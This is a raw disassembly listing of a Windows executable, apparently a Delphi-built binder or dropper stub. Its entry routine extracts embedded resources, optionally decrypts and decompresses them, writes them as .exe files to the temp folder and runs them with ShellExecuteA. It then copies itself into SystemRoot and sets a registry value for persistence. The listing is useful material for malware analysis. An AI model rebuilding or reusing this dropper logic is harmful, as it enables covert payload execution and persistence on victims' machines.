sub_403D98 proc near ; CODE XREF: CODE:00404162�p
var_102 = byte ptr -102h
push ebp
mov ebp, esp
add esp, 0FFFFFEFCh
push ebx
push esi
mov esi, ecx
mov ebx, eax
lea eax, [ebp+var_102]
call sub_403C48
xor eax, eax
push ebp
push offset loc_403DE8
push dword ptr fs:[eax]
mov fs:[eax], esp
mov ecx, esi
lea eax, [ebp+var_102]
mov edx, ebx
call sub_403D5C
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_403DEF
loc_403DDC: ; CODE XREF: sub_403D98+55�j
lea eax, [ebp+var_102]
call sub_403CD4
retn
; ---------------------------------------------------------------------------
loc_403DE8: ; DATA XREF: sub_403D98+1D�o
jmp loc_401B94
; ---------------------------------------------------------------------------
jmp short loc_403DDC
; ---------------------------------------------------------------------------
loc_403DEF: ; CODE XREF: sub_403D98+4F�j
; DATA XREF: sub_403D98+3F�o
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_403D98 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403DF8 proc near ; DATA XREF: CODE:00403FB8�o
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_403E1D
push dword ptr fs:[eax]
mov fs:[eax], esp
inc ds:dword_4064E0
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_403E24
loc_403E1C: ; CODE XREF: sub_403DF8+2A�j
retn
; ---------------------------------------------------------------------------
loc_403E1D: ; DATA XREF: sub_403DF8+6�o
jmp loc_401B94
; ---------------------------------------------------------------------------
jmp short loc_403E1C
; ---------------------------------------------------------------------------
loc_403E24: ; CODE XREF: sub_403DF8:loc_403E1C�j
; DATA XREF: sub_403DF8+1F�o
pop ebp
retn
sub_403DF8 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_403E28 proc near ; DATA XREF: CODE:00403FB4�o
sub ds:dword_4064E0, 1
retn
sub_403E28 endp
; [00000006 BYTES: COLLAPSED FUNCTION RtlDecompressBuffer. PRESS KEYPAD "+" TO EXPAND]
align 4
; =============== S U B R O U T I N E =======================================
sub_403E38 proc near ; CODE XREF: sub_403E44+25�p
test eax, eax
jz short locret_403E41
sub eax, 4
mov eax, [eax]
locret_403E41: ; CODE XREF: sub_403E38+2�j
retn
sub_403E38 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403E44 proc near ; CODE XREF: CODE:00404119�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
push ebx
push esi
push edi
mov esi, [ebp+arg_0]
mov eax, [ebp+arg_4]
call sub_402048
xor eax, eax
push ebp
push offset loc_403EF1
push dword ptr fs:[eax]
mov fs:[eax], esp
mov eax, [ebp+arg_4]
call sub_403E38
mov ebx, eax
cmp ebx, 4
jbe short loc_403ED4
lea eax, [ebp+arg_4]
call sub_4020AC
mov edi, eax
mov edx, [edi]
mov eax, esi
call sub_402184
cmp dword ptr [edi], 80000h
jbe short loc_403E99
mov [ebp+var_8], 2
jmp short loc_403EA0
; ---------------------------------------------------------------------------
loc_403E99: ; CODE XREF: sub_403E44+4A�j
mov [ebp+var_8], 102h
loc_403EA0: ; CODE XREF: sub_403E44+53�j
lea eax, [ebp+var_4]
push eax
sub ebx, 4
push ebx
lea eax, [ebp+arg_4]
call sub_4020AC
add eax, 4
push eax
mov eax, [edi]
push eax
mov eax, esi
call sub_4020AC
push eax
mov eax, [ebp+var_8]
push eax
call RtlDecompressBuffer
mov eax, esi
mov edx, [ebp+var_4]
call sub_402184
jmp short loc_403EDB
; ---------------------------------------------------------------------------
loc_403ED4: ; CODE XREF: sub_403E44+2F�j
mov eax, esi
call sub_401DC4
loc_403EDB: ; CODE XREF: sub_403E44+8E�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_403EF8
loc_403EE8: ; CODE XREF: sub_403E44+B2�j
lea eax, [ebp+arg_4]
call sub_401DC4
retn
; ---------------------------------------------------------------------------
loc_403EF1: ; DATA XREF: sub_403E44+17�o
jmp loc_401B94
; ---------------------------------------------------------------------------
jmp short loc_403EE8
; ---------------------------------------------------------------------------
loc_403EF8: ; CODE XREF: sub_403E44+AC�j
; DATA XREF: sub_403E44+9F�o
pop edi
pop esi
pop ebx
pop ecx
pop ecx
pop ebp
retn 8
sub_403E44 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403F04 proc near ; DATA XREF: CODE:00403FC0�o
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_403F29
push dword ptr fs:[eax]
mov fs:[eax], esp
inc ds:dword_4064E4
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_403F30
loc_403F28: ; CODE XREF: sub_403F04+2A�j
retn
; ---------------------------------------------------------------------------
loc_403F29: ; DATA XREF: sub_403F04+6�o
jmp loc_401B94
; ---------------------------------------------------------------------------
jmp short loc_403F28
; ---------------------------------------------------------------------------
loc_403F30: ; CODE XREF: sub_403F04:loc_403F28�j
; DATA XREF: sub_403F04+1F�o
pop ebp
retn
sub_403F04 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_403F34 proc near ; DATA XREF: CODE:00403FBC�o
sub ds:dword_4064E4, 1
retn
sub_403F34 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403F3C proc near ; DATA XREF: CODE:00403FC8�o
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_403F5B
push dword ptr fs:[eax]
mov fs:[eax], esp
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_403F62
loc_403F5A: ; CODE XREF: sub_403F3C+24�j
retn
; ---------------------------------------------------------------------------
loc_403F5B: ; DATA XREF: sub_403F3C+6�o
jmp loc_401B94
; ---------------------------------------------------------------------------
jmp short loc_403F5A
; ---------------------------------------------------------------------------
loc_403F62: ; CODE XREF: sub_403F3C:loc_403F5A�j
; DATA XREF: sub_403F3C+19�o
pop ebp
retn
sub_403F3C endp
; ---------------------------------------------------------------------------
dword_403F64 dd 0Ch ; DATA XREF: CODE:00403FDE�o
dd offset off_403F6C
off_403F6C dd offset loc_402A5C ; DATA XREF: CODE:00403F68�o
dd offset sub_402A2C
dd offset sub_402914
dd offset sub_4028CC
dd offset sub_402A94
dd offset sub_402A64
dd offset sub_402BBC
dd offset sub_402B8C
dd offset sub_402C04
dd offset sub_402BD4
dd offset sub_403478
dd offset sub_403448
dd offset sub_40362C
dd offset sub_4035FC
dd offset sub_4038F8
dd offset sub_4038C8
dd offset sub_403C40
dd offset sub_403C10
dd offset sub_403E28
dd offset sub_403DF8
dd offset sub_403F34
dd offset sub_403F04
align 8
dd offset sub_403F3C
; ---------------------------------------------------------------------------
public start
start:
push ebp
mov ebp, esp
mov ecx, 0Eh
loc_403FD4: ; CODE XREF: CODE:00403FD9�j
push 0
push 0
dec ecx
jnz short loc_403FD4
push ebx
push esi
push edi
mov eax, offset dword_403F64
call sub_4029E8
xor eax, eax
push ebp
push offset loc_404813
push dword ptr fs:[eax]
mov fs:[eax], esp
mov edx, offset dword_404824
mov eax, offset dword_406E1C
call sub_403368
mov ebx, eax
test ebx, ebx
jnz short loc_404012
push 0
call ExitProcess_0
loc_404012: ; CODE XREF: CODE:00404009�j
mov edx, offset dword_40664C
mov eax, ebx
mov ecx, ds:dword_406E1C
call sub_401264
mov ds:dword_406E20, 0Ah
mov ebx, offset dword_406DCC
mov esi, offset dword_406DF4
mov edi, offset dword_40664C
loc_40403D: ; CODE XREF: CODE:00404572�j
mov eax, offset dword_406E24
mov edx, 4
call sub_402B84
cmp dword ptr [ebx], 0
jz short loc_404055
xor eax, eax
mov [ebx], eax
loc_404055: ; CODE XREF: CODE:0040404F�j
mov edx, edi
mov eax, esi
call sub_403368
mov [ebx], eax
cmp dword ptr [ebx], 0
jz loc_404560
mov eax, offset dword_406E24
mov edx, [esi]
call sub_402184
mov eax, offset dword_406E24
call sub_4020AC
mov edx, eax
mov eax, [ebx]
mov ecx, [esi]
call sub_401264
mov eax, edi
mov ds:dword_406F84, eax
lea edx, [ebp-14h]
xor eax, eax
call sub_4013B0
mov eax, [ebp-14h]
mov ecx, offset dword_406F80
mov edx, offset dword_406F7C
call sub_402E38
cmp al, 1
jnz short loc_4040DC
mov eax, ds:dword_406F80
xor edx, edx
push edx
push eax
mov eax, ds:dword_406F84
mov edx, [eax+0BCh]
mov eax, [eax+0B8h]
cmp edx, [esp+4]
jnz short loc_4040D4
cmp eax, [esp]
loc_4040D4: ; CODE XREF: CODE:004040CF�j
pop edx
pop eax
jnz loc_404560
loc_4040DC: ; CODE XREF: CODE:004040AF�j
mov eax, ds:dword_406F84
cmp byte ptr [eax+0A2h], 0
jz short loc_404104
lea edx, [ebp-18h]
mov eax, ds:dword_406E24
call sub_403168
mov edx, [ebp-18h]
mov eax, offset dword_406E24
call sub_401E18
loc_404104: ; CODE XREF: CODE:004040E8�j
mov eax, ds:dword_406F84
cmp byte ptr [eax+6Ah], 0
jz short loc_40412B
mov eax, ds:dword_406E24
push eax
lea eax, [ebp-1Ch]
push eax
call sub_403E44
mov edx, [ebp-1Ch]
mov eax, offset dword_406E24
call sub_401E18
loc_40412B: ; CODE XREF: CODE:0040410D�j
mov eax, ds:dword_406F84
cmp byte ptr [eax+48h], 0
jz short loc_4041B4
mov eax, ds:dword_406F84
cmp byte ptr [eax+49h], 0
jz short loc_404176
lea eax, [ebp-24h]
mov edx, ds:dword_406F84
add edx, 60h
mov ecx, 0Ah
call sub_401EEC
mov edx, [ebp-24h]
lea ecx, [ebp-20h]
mov eax, ds:dword_406E24
call sub_403D98
mov edx, [ebp-20h]
mov eax, offset dword_406E24
call sub_401E18
jmp short loc_4041B4
; ---------------------------------------------------------------------------
loc_404176: ; CODE XREF: CODE:0040413F�j
mov eax, ds:dword_406F84
push dword ptr [eax+5Ch]
push dword ptr [eax+58h]
mov eax, ds:dword_406F84
push dword ptr [eax+54h]
push dword ptr [eax+50h]
lea eax, [ebp-28h]
mov edx, ds:dword_406F84
add edx, 60h
mov ecx, 0Ah
call sub_401EEC
mov edx, [ebp-28h]
mov ecx, offset dword_406E24
mov eax, ds:dword_406E24
call sub_403B84
loc_4041B4: ; CODE XREF: CODE:00404134�j
; CODE:00404174�j
mov eax, ds:dword_406F84
cmp byte ptr [eax+0B0h], 0
jz loc_404377
lea edx, [ebp-2Ch]
xor eax, eax
call sub_4013B0
mov eax, [ebp-2Ch]
mov ecx, offset dword_406F80
mov edx, offset dword_406F7C
call sub_402E38
test al, al
jnz loc_404348
call sub_401410
lea edx, [ebp-30h]
mov eax, offset dword_404830
call sub_4033B0
push dword ptr [ebp-30h]
push offset dword_40483C
mov eax, 0Ah
call sub_4018C8
lea edx, [ebp-34h]
call sub_4030FC
push dword ptr [ebp-34h]
mov eax, 0Ah
call sub_4018C8
lea edx, [ebp-38h]
call sub_4030FC
push dword ptr [ebp-38h]
mov eax, 0Ah
call sub_4018C8
lea edx, [ebp-3Ch]
call sub_4030FC
push dword ptr [ebp-3Ch]
push offset dword_404848
mov eax, offset dword_406F74
mov edx, 6
call sub_401FC4
push offset dword_406E24
mov eax, ds:dword_406E24
call sub_401F04
cdq
push edx
push eax
mov eax, ds:dword_406F84
mov edx, [eax+0BCh]
mov eax, [eax+0B8h]
sub [esp], eax
sbb [esp+4], edx
pop eax
pop edx
add eax, 1
adc edx, 0
push eax
mov eax, ds:dword_406F84
mov eax, [eax+0B8h]
mov ecx, eax
mov eax, ds:dword_406E24
pop edx
call sub_4020B4
lea edx, [ebp-44h]
xor eax, eax
call sub_4013B0
mov eax, [ebp-44h]
lea edx, [ebp-40h]
call sub_402CDC
mov edx, [ebp-40h]
mov eax, offset dword_406E24
mov ecx, ds:dword_406E24
call sub_401F50
mov edx, ds:dword_406F74
mov eax, offset dword_406E28
call sub_4016A4
mov edx, 1
mov eax, offset dword_406E28
call sub_401A08
call sub_401228
push 0
mov eax, ds:dword_406E24
call sub_401F04
push eax
mov eax, offset dword_406E24
call sub_4020AC
mov edx, eax
mov eax, offset dword_406E28
pop ecx
call sub_4017C8
call sub_401228
mov eax, offset dword_406E28
call sub_4017E8
call sub_401228
push 0
push 0
push 0
mov eax, ds:dword_406F74
call sub_402058
push eax
push offset aOpen ; "open"
push 0
call ShellExecuteA
jmp loc_404560
; ---------------------------------------------------------------------------
loc_404348: ; CODE XREF: CODE:004041E4�j
mov eax, ds:dword_406E24
call sub_401F04
cdq
push edx
push eax
mov eax, ds:dword_406F80
xor edx, edx
sub [esp], eax
sbb [esp+4], edx
pop eax
pop edx
mov edx, eax
mov eax, offset dword_406E24
mov ecx, ds:dword_406F80
call sub_4020F4
loc_404377: ; CODE XREF: CODE:004041C0�j
mov eax, ds:dword_406F84
cmp byte ptr [eax+6Bh], 0
jz short loc_4043BC
loc_404382: ; CODE XREF: CODE:004043BA�j
push 0
lea edx, [ebp-48h]
xor eax, eax
call sub_4013B0
mov eax, [ebp-48h]
push eax
mov eax, offset dword_406E24
call sub_4020AC
xor ecx, ecx
pop edx
call sub_403640
mov ds:byte_406F78, al
push 0FA0h
call Sleep
cmp ds:byte_406F78, 1
jnz short loc_404382
loc_4043BC: ; CODE XREF: CODE:00404380�j
mov eax, ds:dword_406F84
cmp byte ptr [eax+6Ch], 0
jz short loc_4043FF
loc_4043C7: ; CODE XREF: CODE:004043FD�j
push 0
mov eax, offset dword_406E24
call sub_4020AC
push eax
lea eax, [ebp-4Ch]
call sub_403038
mov edx, [ebp-4Ch]
xor ecx, ecx
pop eax
call sub_403640
mov ds:byte_406F78, al
push 0FA0h
call Sleep
cmp ds:byte_406F78, 1
jnz short loc_4043C7
loc_4043FF: ; CODE XREF: CODE:004043C5�j
mov eax, ds:dword_406F84
cmp byte ptr [eax+6Dh], 0
jz loc_404560
lea eax, [ebp-54h]
mov edx, ds:dword_406F84
add edx, 6Eh
mov ecx, 32h
call sub_401EEC
mov eax, [ebp-54h]
lea edx, [ebp-50h]
call sub_4033B0
mov edx, [ebp-50h]
mov eax, offset dword_406F74
call sub_401E18
cmp ds:dword_406F74, 0
jnz short loc_40449B
lea eax, [ebp-58h]
mov edx, ds:dword_406F84
add edx, 6Eh
mov ecx, 32h
call sub_401EEC
mov eax, [ebp-58h]
call sub_402CB8
test al, al
jz short loc_404481
mov eax, offset dword_406F74
mov edx, ds:dword_406F84
add edx, 6Eh
mov ecx, 32h
call sub_401EEC
jmp short loc_40449B
; ---------------------------------------------------------------------------
loc_404481: ; CODE XREF: CODE:00404465�j
lea edx, [ebp-5Ch]
mov eax, offset dword_404830
call sub_4033B0
mov edx, [ebp-5Ch]
mov eax, offset dword_406F74
call sub_401E18
loc_40449B: ; CODE XREF: CODE:00404443�j
; CODE:0040447F�j
push ds:dword_406F74
push offset dword_40483C
lea eax, [ebp-60h]
mov edx, ds:dword_406F84
add edx, 0Ah
mov ecx, 32h
call sub_401EEC
push dword ptr [ebp-60h]
mov eax, offset dword_406F74
mov edx, 3
call sub_401FC4
mov edx, ds:dword_406F74
mov eax, offset dword_406E28
call sub_4016A4
mov edx, 1
mov eax, offset dword_406E28
call sub_401A08
call sub_401228
push 0
mov eax, ds:dword_406E24
call sub_401F04
push eax
mov eax, offset dword_406E24
call sub_4020AC
mov edx, eax
mov eax, offset dword_406E28
pop ecx
call sub_4017C8
call sub_401228
mov eax, offset dword_406E28
call sub_4017E8
call sub_401228
mov eax, ds:dword_406F84
cmp byte ptr [eax+0A0h], 0
jz short loc_404560
mov eax, ds:dword_406F84
movzx eax, byte ptr [eax+0A1h]
push eax
push 0
push 0
mov eax, ds:dword_406F74
call sub_402058
push eax
push offset aOpen ; "open"
push 0
call ShellExecuteA
loc_404560: ; CODE XREF: CODE:00404063�j
; CODE:004040D6�j ...
add edi, 0C0h
add esi, 4
add ebx, 4
dec ds:dword_406E20
jnz loc_40403D
mov edx, offset aAus ; "AUS"
mov eax, offset dword_4064F8
call sub_403368
mov ebx, eax
test ebx, ebx
jz loc_4047F8 ; default
; jumptable 00404745 case 0
cmp ds:dword_4064F8, 0
jle loc_4047F8 ; default
; jumptable 00404745 case 0
lea edx, [ebp-64h]
xor eax, eax
call sub_4013B0
mov eax, [ebp-64h]
mov ecx, offset dword_406F80
mov edx, offset dword_406F7C
call sub_402E38
test al, al
jnz loc_4047F8 ; default
; jumptable 00404745 case 0
mov edx, offset dword_4064FC
mov eax, ebx
mov ecx, ds:dword_4064F8
call sub_401264
mov eax, offset dword_4064E8
mov edx, offset dword_406504
mov ecx, 81h
call sub_401EEC
mov eax, offset dword_4064EC
mov edx, offset byte_406585
mov ecx, 41h
call sub_401EEC
mov eax, offset dword_4064F0
mov edx, offset word_4065C6
mov ecx, 41h
call sub_401EEC
mov eax, offset dword_4064F4
mov edx, offset byte_406607
mov ecx, 41h
call sub_401EEC
push 0
push 14h
push 0
push 32h
mov ecx, offset dword_4064E8
mov edx, offset dword_404864
mov eax, ds:dword_4064E8
call sub_403B84
push 0
push 14h
push 0
push 32h
mov ecx, offset dword_4064EC
mov edx, offset dword_404864
mov eax, ds:dword_4064EC
call sub_403B84
push 0
push 14h
push 0
push 32h
mov ecx, offset dword_4064F0
mov edx, offset dword_404864
mov eax, ds:dword_4064F0
call sub_403B84
push 0
push 14h
push 0
push 32h
mov ecx, offset dword_4064F4
mov edx, offset dword_404864
mov eax, ds:dword_4064F4
call sub_403B84
lea edx, [ebp-68h]
mov eax, ds:dword_4064F0
call sub_4033B0
mov edx, [ebp-68h]
mov eax, offset dword_406F74
call sub_401E18
cmp ds:dword_406F74, 0
jnz short loc_4046F1
mov eax, ds:dword_4064F0
call sub_402CB8
test al, al
jz short loc_4046D7
mov eax, offset dword_406F74
mov edx, ds:dword_4064F0
call sub_401E18
jmp short loc_4046F1
; ---------------------------------------------------------------------------
loc_4046D7: ; CODE XREF: CODE:004046C3�j
lea edx, [ebp-6Ch]
mov eax, offset aSystemroot ; "SystemRoot"
call sub_4033B0
mov edx, [ebp-6Ch]
mov eax, offset dword_406F74
call sub_401E18
loc_4046F1: ; CODE XREF: CODE:004046B5�j
; CODE:004046D5�j
push ds:dword_406F74
push offset dword_40483C
push ds:dword_4064F4
mov eax, offset dword_406F74
mov edx, 3
call sub_401FC4
push 0
mov eax, ds:dword_406F74
call sub_402058
push eax
lea edx, [ebp-70h]
xor eax, eax
call sub_4013B0
mov eax, [ebp-70h]
call sub_402058
push eax
call CopyFileA
mov eax, ds:dword_4064FC
cmp eax, 5 ; switch 6 cases
ja loc_4047F8 ; default
; jumptable 00404745 case 0
jmp off_40474C[eax*4] ; switch jump
; ---------------------------------------------------------------------------
off_40474C dd offset loc_4047F8 ; DATA XREF: CODE:00404745�r
dd offset loc_404764 ; jump table for switch statement
dd offset loc_404782
dd offset loc_4047A0
dd offset loc_4047BE
dd offset loc_4047DC
; ---------------------------------------------------------------------------
loc_404764: ; CODE XREF: CODE:00404745�j
; DATA XREF: CODE:off_40474C�o
mov eax, ds:dword_406F74 ; jumptable 00404745 case 1
push eax
mov ecx, ds:dword_4064EC
mov edx, ds:dword_4064E8
mov eax, 80000000h
call sub_402C0C
jmp short loc_4047F8 ; default
; jumptable 00404745 case 0
; ---------------------------------------------------------------------------
loc_404782: ; CODE XREF: CODE:00404745�j
; DATA XREF: CODE:off_40474C�o
mov eax, ds:dword_406F74 ; jumptable 00404745 case 2
push eax
mov ecx, ds:dword_4064EC
mov edx, ds:dword_4064E8
mov eax, 80000001h
call sub_402C0C
jmp short loc_4047F8 ; default
; jumptable 00404745 case 0
; ---------------------------------------------------------------------------
loc_4047A0: ; CODE XREF: CODE:00404745�j
; DATA XREF: CODE:off_40474C�o
mov eax, ds:dword_406F74 ; jumptable 00404745 case 3
push eax
mov ecx, ds:dword_4064EC
mov edx, ds:dword_4064E8
mov eax, 80000002h
call sub_402C0C
jmp short loc_4047F8 ; default
; jumptable 00404745 case 0
; ---------------------------------------------------------------------------
loc_4047BE: ; CODE XREF: CODE:00404745�j
; DATA XREF: CODE:off_40474C�o
mov eax, ds:dword_406F74 ; jumptable 00404745 case 4
push eax
mov ecx, ds:dword_4064EC
mov edx, ds:dword_4064E8
mov eax, 80000003h
call sub_402C0C
jmp short loc_4047F8 ; default
; jumptable 00404745 case 0
; ---------------------------------------------------------------------------
loc_4047DC: ; CODE XREF: CODE:00404745�j
; DATA XREF: CODE:off_40474C�o
mov eax, ds:dword_406F74 ; jumptable 00404745 case 5
push eax
mov ecx, ds:dword_4064EC
mov edx, ds:dword_4064E8
mov eax, 80000005h
call sub_402C0C
loc_4047F8: ; CODE XREF: CODE:0040458B�j
; CODE:00404598�j ...
xor eax, eax ; default
; jumptable 00404745 case 0
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40481A
loc_404805: ; CODE XREF: CODE:00404818�j
lea eax, [ebp-70h]
mov edx, 18h
call sub_401DE8
retn
; ---------------------------------------------------------------------------
loc_404813: ; DATA XREF: CODE:00403FEB�o
jmp loc_401B94
; ---------------------------------------------------------------------------
jmp short loc_404805
; ---------------------------------------------------------------------------
loc_40481A: ; CODE XREF: CODE:00404812�j
; DATA XREF: CODE:00404800�o
pop edi
pop esi
pop ebx
call sub_401CDC
; ---------------------------------------------------------------------------
align 4
dword_404824 dd 544553h, 0FFFFFFFFh, 3 ; DATA XREF: CODE:00403FF6�o
dword_404830 dd 504D54h, 0FFFFFFFFh, 1 ; DATA XREF: CODE:004041F2�o
; CODE:00404484�o
dword_40483C dd 5Ch, 0FFFFFFFFh, 4 ; DATA XREF: CODE:004041FF�o
; CODE:004044A1�o ...
dword_404848 dd 6578652Eh, 0 ; DATA XREF: CODE:00404243�o
aOpen db 'open',0 ; DATA XREF: CODE:00404337�o
; CODE:00404554�o
align 4
aAus db 'AUS',0 ; DATA XREF: CODE:00404578�o
dd 0FFFFFFFFh, 3
dword_404864 dd 747561h, 0FFFFFFFFh, 0Ah ; DATA XREF: CODE:00404631�o
; CODE:0040464D�o ...
aSystemroot db 'SystemRoot',0 ; DATA XREF: CODE:004046DA�o
align 200h
CODE ends
; Section 2. (virtual address 00005000)
; Virtual size : 000000C8 ( 200.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00003E00
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
DATA segment para public 'DATA' use32
assume cs:DATA
;org 405000h
dword_405000 dd 0 ; DATA XREF: sub_401CAC+2�w
; sub_401CDC+9�o ...
dword_405004 dd 0 ; DATA XREF: sub_4011C4�w
; sub_401CDC:loc_401D0B�r ...
dword_405008 dd 0 ; DATA XREF: sub_401410+31�w
; sub_4018C8+3�r ...
byte_40500C db 2 ; DATA XREF: sub_40190C+4E�r
; sub_4019EC�r ...
db 8Dh, 40h, 0
byte_405010 db 0 ; DATA XREF: sub_401B6C�r
db 8Dh, 40h, 0
byte_405014 db 1 ; DATA XREF: sub_4016A4+25�r
db 8Dh, 40h, 0
dword_405018 dd 0 ; DATA XREF: sub_402858�r sub_402858+8�w
dword_40501C dd 0 ; DATA XREF: sub_402868+4�r
off_405020 dd offset sub_402868 ; DATA XREF: sub_401CDC+66�r
off_405024 dd offset nullsub_1 ; DATA XREF: sub_402260+67�r
off_405028 dd offset nullsub_1 ; DATA XREF: sub_402260+71�r
off_40502C dd offset sub_401C00 ; DATA XREF: sub_401C00+F�r
; sub_401C00+35�r ...
off_405030 dd offset sub_401BCC ; DATA XREF: sub_401CDC:loc_401D2A�r
off_405034 dd offset nullsub_1 ; DATA XREF: sub_401CDC:loc_401D5D�r
off_405038 dd offset nullsub_1 ; DATA XREF: sub_4028CC:loc_4028F4�r
; DWORD dwFlags
dwFlags dd 0 ; DATA XREF: sub_4010F4+1�r
; sub_401108+4�r ...
off_405040 dd offset sub_4010F4 ; DATA XREF: sub_401144+4�r
; sub_401174+3F�r
off_405044 dd offset sub_401108 ; DATA XREF: sub_40115C+4�r
; sub_401174+26�r
off_405048 dd offset sub_40112C ; DATA XREF: sub_401174+D�r
byte_40504C db 0 ; DATA XREF: sub_4011D0+36�r
aRsu db 'ΛΜΘΙΧΟΘΝΞΫΨΚΩΪάέήίΰαγ',0
aFxn@ db 'δε@',0
dword_405068 dd 3 ; DATA XREF: sub_40190C+5A�r
align 10h
dd 1, 2, 3, 3 dup(0)
off_405088 dd offset nullsub_1 ; DATA XREF: sub_401CDC+38�r
dword_40508C dd 0 ; DATA XREF: sub_4029DC�o
; sub_4029E8+33�o
dword_405090 dd 0 ; DATA XREF: sub_4029E8+1B�w
dword_405094 dd 0 ; DATA XREF: sub_4029E8+22�w
dword_405098 dd 0 ; DATA XREF: sub_4029E8+29�w
dd 2 dup(0)
dword_4050A4 dd 1 ; DATA XREF: sub_403634+3�r
dd 10h, 2, 20h, 4, 40h, 4, 40h
off_4050C4 dd offset byte_40500C ; DATA XREF: sub_402CDC+33�r
align 200h
DATA ends
; Section 3. (virtual address 00006000)
; Virtual size : 00000F89 ( 3977.)
; Section size in file : 00000000 ( 0.)
; Offset to raw data for section: 00004000
; Flags C0000000: Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Regular
; Segment permissions: Read/Write
BSS segment para public '' use32
assume cs:BSS
;org 406000h
assume es:nothing, ss:nothing, ds:CODE, fs:nothing, gs:nothing
dword_406000 dd ? ; DATA XREF: sub_402914+13�w
dword_406004 dd ? ; DATA XREF: sub_4011D0+9�r
; sub_4011D0+16�r
dword_406008 dd ? ; DATA XREF: sub_401B6C+1C�r
; sub_401C70�w
dword_40600C dd ? ; DATA XREF: sub_401C70+A�w
dword_406010 dd ? ; DATA XREF: sub_401CDC+A0�r
; sub_401CDC+A9�r
dword_406014 dd ? ; DATA XREF: sub_401C70+29�w
dword_406018 dd ? ; DATA XREF: sub_402914+27�w
byte_40601C db ? ; DATA XREF: sub_401C70+2E�w
align 10h
dword_406020 dd ? ; DATA XREF: sub_401CDC+E�o
dword_406024 dd 73h dup(?) ; DATA XREF: sub_4017E8:loc_401827�o
dword_4061F0 dd 73h dup(?) ; DATA XREF: CODE:loc_401645�o
dword_4063BC dd ? ; DATA XREF: sub_4028CC+11�w
; sub_402914�w
; HANDLE hHeap
hHeap dd ? ; DATA XREF: sub_4010F4+7�r
; sub_401108+D�r ...
dword_4063C4 dd 2 dup(?) ; DATA XREF: sub_401BCC+4�o
; sub_401CAC+D�o ...
dword_4063CC dd ? ; DATA XREF: sub_401C54�r
; sub_401C70+14�w
dword_4063D0 dd ? ; DATA XREF: sub_401C00+20�w
; sub_401C70+1B�w
dword_4063D4 dd ? ; DATA XREF: sub_401C70+20�w
dd 6 dup(?)
dword_4063F0 dd ? ; DATA XREF: sub_4028CC+19�r
; sub_4028CC+22�r
dword_4063F4 dd ? ; DATA XREF: sub_402580�o
; sub_402580+19�w ...
dword_4063F8 dd ? ; DATA XREF: sub_4025A8�r
dd 29h dup(?)
byte_4064A0 db ? ; DATA XREF: sub_40299C�r
align 4
; DWORD TlsIndex
TlsIndex dd ? ; DATA XREF: sub_402958+C�r
; sub_402958+37�r ...
dd ?
; HMODULE hModule
hModule dd ? ; DATA XREF: sub_4029E8+11�w
; sub_4029E8+16�r ...
dword_4064B0 dd ? ; DATA XREF: sub_402A2C+11�w
; CODE:loc_402A5C�w
dword_4064B4 dd ? ; DATA XREF: sub_40299C:loc_4029CB�r
dword_4064B8 dd ? ; DATA XREF: sub_402A64+11�w
; sub_402A94�w
dword_4064BC dd ? ; DATA XREF: sub_402B8C+11�w
; sub_402BBC�w
dword_4064C0 dd ? ; DATA XREF: sub_402BD4+11�w
; sub_402C04�w
dword_4064C4 dd ? ; DATA XREF: sub_403448+11�w
; sub_403478�w
dword_4064C8 dd ? ; DATA XREF: sub_4035FC+11�w
; sub_40362C�w
dword_4064CC dd ? ; DATA XREF: sub_40348C+6�r
; sub_40348C+24�w ...
dword_4064D0 dd ? ; DATA XREF: sub_40350C+6�r
; sub_40350C+24�w ...
dword_4064D4 dd ? ; DATA XREF: sub_403590+3�r
; sub_403590+21�w ...
dword_4064D8 dd ? ; DATA XREF: sub_4038C8+11�w
; sub_4038F8�w
dword_4064DC dd ? ; DATA XREF: sub_403C10+11�w
; sub_403C40�w
dword_4064E0 dd ? ; DATA XREF: sub_403DF8+11�w
; sub_403E28�w
dword_4064E4 dd ? ; DATA XREF: sub_403F04+11�w
; sub_403F34�w
dword_4064E8 dd ? ; DATA XREF: CODE:004045D4�o
; CODE:0040462C�o ...
dword_4064EC dd ? ; DATA XREF: CODE:004045E8�o
; CODE:00404648�o ...
dword_4064F0 dd ? ; DATA XREF: CODE:004045FC�o
; CODE:00404664�o ...
dword_4064F4 dd ? ; DATA XREF: CODE:00404610�o
; CODE:00404680�o ...
dword_4064F8 dd ? ; DATA XREF: CODE:0040457D�o
; CODE:00404591�r ...
dword_4064FC dd ? ; DATA XREF: CODE:004045C2�o
; CODE:00404736�r
dd ?
dword_406504 dd 20h dup(?) ; DATA XREF: CODE:004045D9�o
db ?
byte_406585 db 3 dup(?) ; DATA XREF: CODE:004045ED�o
dd 0Fh dup(?)
db 2 dup(?)
word_4065C6 dw ? ; DATA XREF: CODE:00404601�o
dd 0Fh dup(?)
db 3 dup(?)
byte_406607 db ? ; DATA XREF: CODE:00404615�o
dd 11h dup(?)
dword_40664C dd 1E0h dup(?) ; DATA XREF: CODE:loc_404012�o
; CODE:00404038�o
